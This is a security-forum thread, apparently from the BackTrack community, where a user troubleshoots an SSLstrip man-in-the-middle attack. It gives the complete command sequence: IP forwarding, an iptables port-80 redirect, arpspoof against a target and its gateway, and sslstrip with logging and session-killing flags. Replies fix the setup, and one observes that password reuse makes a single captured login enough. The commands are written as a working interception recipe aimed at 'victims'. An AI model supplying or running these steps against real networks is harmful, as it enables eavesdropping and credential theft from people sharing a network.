Results 1 to 7 of 7

Thread: How can I get SSL Strip to log traffic?

  1. #1
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    4

    Default How can I get SSL Strip to log traffic?

    Hello,

    I am trying to get SSL Strip to work on my wireless network. Everything seems fine until the very end.

    Here is what I do:

    echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    sudo arpspoof -i wlan1 -t ip_to_attack gateway_ip

    This seems to work. A connection is made. My MAC is now considered to be the gateway IP.

    The I run sudo python sslstrip.py -a -l 8080 -k.

    AIUI, the -a option logs all traffic.

    Although the sslstrip.log is created, it stays empty (0 bytes).

    There is traffic on the network and with the -a option surely it should be logged. What am I doing wrong?

    Many thanks!

  2. #2
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: How can I get SSL Strip to log traffic?

    I don't know if that may be the origin of you problem, but you login as root, so you shouldn't have to use "sudo".
    Second, your first command seems wrong (I'm not an exepert, so it might work, but a glance at author's website and you have it :
    echo "1" > /proc/sys/net/ipv4/ip_forward
    Also, to run sslstrip, you only need to type "sslstrip -a -l [port] -k"

    Next time, try and do some more research : first result for "sslstrip" in google is : "http://www.thoughtcrime.org/software/sslstrip/"

    Just to be sure, you are running backtrack right ?

  3. #3
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    4

    Default Re: How can I get SSL Strip to log traffic?

    Thanks for the advice.

    I now realise the problem is nothing to do with SSL Strip and everything to do with Arpspoof.

    As root I type:

    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    Then:

    arpspoof -i wlan1 -t 192.168.2.10 192.168.2.1 where 192.168.2.10 is my XP machine.

    At this point the screen show that the gateway IP is at my MAC address - for example:

    0:c0:cd:43:ed:1f 0:14:f4:60:df:78 0806 42: arp reply 192.168.2.1 is-at 0:c0:cd:43:ed:1f

    However, on that XP machine I can no longer use the internet - no pages load - all time out. When I cancel arpsoofing, I can load pages again

    Can someone please tell me why I cannot arpspoof? Thanks.


    I also did arpspoofing in both ways so the target believes I am the AP and the AP believes I am the target.

    I still have the same problem - the target cannot use the internet.
    Last edited by sickness; 02-18-2011 at 05:23 PM. Reason: Merged posts.

  4. #4
    Member
    Join Date
    Feb 2010
    Posts
    78

    Default Re: How can I get SSL Strip to log traffic?

    Can someone please tell me why I cannot arpspoof?
    You can ARP spoof just fine, that's your problem. The target thinks your computer is the router but your computer isn't actually sending those packets after that point. Do a tracert from the victim machine to see for yourself. I believe, and I could very possibly be wrong, the problem is with your attempt to enable ip_forwarding. It should be,
    Code:
    echo 1 > ...
    not
    Code:
    echo "1" > ...
    Echoing "1" sends the text value of 1 instead of the integer 1. I think.
    Computer security is a temporary condition.

  5. #5
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    4

    Default

    Thanks for the advice.

    You are correct that the target is sending his traffic through my computer but then my computer refuses to forward it.

    When I traceroute from the target to the gateway the first hop is my computer then everything times out.

    Using echo 1 > rather than echo "1" > doesn't change anything and anyhow in the original instructions "1" is used: http://www.thoughtcrime.org/software/sslstrip/

    So the question is: why is my computer not forwarding the traffic it receives from the target?

    Sorry....please merge this thread, thanks.

    I have solved the problem detailed above by disabling my firewall since syslog showed UFW BLOCK.

    So now a traceroute from the target to the gateway via my IP as the MITM works.

    However, when I load a Firefox page from the target I now get "Connection Interrupted. The document contains no data."

    There are plenty of results for this on Google but nothing that explains what the solution is.

    Any more ideas gratefully received. Thanks!


    EDIT:

    The solution was simple. Foolishly I assumed that traffic was redirected when one started arpspoofing when in fact it is redirected once one uses sslstrip's -l 10000 (or whatever port number) option.

    My other suggestion is to turn off the UFW firewall or whatever is used because in my case that blocked redirection to the gateway.

    Another point regarding the -k option: if one is logged into Yahoo, Hotmail, or Facebook, -k will log you out. But it will not log you out of Gmail. Any idea why?

    Finally, occasionally, when I try to arpspoof -i wlan1 -t target_ip gateway_ip the screen indicated that spoofing begins but the MAC address of the target was 0:0:0:0:0:0. Obviously this is not good but what is the technical term for the six zeros?

    Thanks again.
    Last edited by sickness; 02-21-2011 at 01:06 PM. Reason: Merging...

  6. #6
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: How can I get SSL Strip to log traffic?

    Well, this happens when you try to convince a non-existing target on your network that you are the AP. Mac then can't be resolved, hence the zeros ! Check your target ip adress

    About the -k option, it works flawlessly for me... Only two sites didn't log me out : backtrack forums and another one. With that said, since people tend to use the same passwords everywhere, one site not logging out shouldn't be much of a problem !
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  7. #7
    Senior Member
    Join Date
    Jan 2011
    Location
    over the under
    Posts
    197

    Default Re: How can I get SSL Strip to log traffic?

    when i do the specify my -t option I do -t <victims ip> <victims router> I'm pretty sure thats what comax is saying just in case you didn't already figure that out.

Similar Threads

  1. SSL Strip Havoc
    By RexBudman in forum Beginners Forum
    Replies: 0
    Last Post: 10-28-2010, 11:37 PM
  2. SSL Strip Error
    By QKiani in forum Beginners Forum
    Replies: 3
    Last Post: 05-23-2010, 09:06 PM
  3. ssl-strip python error
    By BitUnique in forum Beginners Forum
    Replies: 0
    Last Post: 04-18-2010, 11:29 PM
  4. SSL Strip and Tor
    By leftler in forum OLD BackTrack 4 General Support
    Replies: 4
    Last Post: 08-03-2009, 06:34 AM
  5. SSL Strip
    By imported_wyze in forum OLD BackTrack 4 Bugs and Fixes
    Replies: 3
    Last Post: 06-22-2009, 12:53 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •